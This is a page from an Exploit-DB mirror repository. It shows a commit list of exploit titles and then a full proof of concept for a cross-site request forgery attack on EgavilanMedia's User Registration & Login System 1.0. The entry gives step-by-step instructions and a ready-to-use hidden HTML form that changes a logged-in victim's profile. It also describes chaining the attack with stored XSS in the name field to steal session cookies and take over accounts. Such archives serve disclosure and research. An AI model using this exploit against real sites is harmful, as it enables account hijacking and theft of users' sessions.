bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/49151.txt
Offensive Security 0ffa4d35c4 DB: 2020-12-03 
32 changes to exploits/shellcodes

aSc TimeTables 2021.6.2 - Denial of Service (PoC)
IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path
Microsoft Windows - Win32k Elevation of Privilege
Ksix Zigbee Devices - Playback Protection Bypass (PoC)
Mitel mitel-cs018 - Call Data Information Disclosure
Expense Management System - 'description' Stored Cross Site Scripting
ILIAS Learning Management System 4.3 - SSRF
Pharmacy Store Management System 1.0 - 'id' SQL Injection
Under Construction Page with CPanel 1.0 - SQL injection
EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
Student Result Management System 1.0 - Authentication Bypass SQL Injection
EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting
WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution
WonderCMS 3.1.3 - Authenticated Remote Code Execution
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting
NewsLister - Authenticated Persistent Cross-Site Scripting
Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting
Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting
Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting
Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork
Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
DotCMS 20.11 - Stored Cross-Site Scripting
WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
ChurchCRM 4.2.0 - CSV/Formula Injection
ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)
Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality
Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover
Simple College Website 1.0 - 'page' Local File Inclusion
Car Rental Management System 1.0 - SQL Injection / Local File include
WordPress Plugin Wp-FileManager 6.8 - RCE
2020-12-03 05:01:56 +00:00

65 lines
No EOL
2.6 KiB
Text
Raw Blame History

# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
# Date: 01-12-2020
# Exploit Author: Hardik Solanki
# Vendor Homepage: http://egavilanmedia.com
# Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
# Version: 1.0
# Tested on Windows 10
CSRF ATTACK:
Cross-site request forgery (also known as CSRF) is a web security
vulnerability that allows an attacker to induce users to perform actions
that they do not intend to perform. It allows an attacker to partly
circumvent the same-origin policy, which is designed to prevent different
websites from interfering with each other.
Attack Vector:
An attacker can update any user's account. (Note: FULL NAME field is also
vulnerable to stored XSS & attacker can steal the authenticated Session os
the user)
Steps to reproduce:
1. Open user login page using the following URL:
->
http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html
2. Now login with the "attacker" user account & navigate to the edit
profile tab. Click on the "Update" button and intercept the request in web
proxy tool called "Burpusite"
3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below
code.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="
http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php"
method="POST">
<input type="hidden" name="fullname" value="Attacker" />
<input type="hidden" name="username" value="hunterr" />
<input type="hidden" name="email"
value="noooobhunter&#64;gmail&#46;com" />
<input type="hidden" name="gender" value="Male" />
<input type="hidden" name="action" value="update&#95;user" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Now, login with the "Victim/Normal user" account. (Let that user is
currently authenticated in the browser).
5. Paste the URL in the browser, which is copied in step 3. OR submit the
CSRF POC code, which is shown in step 3.
6. We receive a "Status: Success", which indicates that the CSRF attack is
successfully done & the Attacker can takeover the user account via Stored
XSS (Steal the authenticated Cookies of the user from the "FULL NAME"
parameter)
IMPACT:
An attacker can takeover any user account. (Note: FULL NAME field is also
vulnerable to stored XSS & attacker can steal the authenticated Session os
the user)
Reference in a new issue View git blame Copy permalink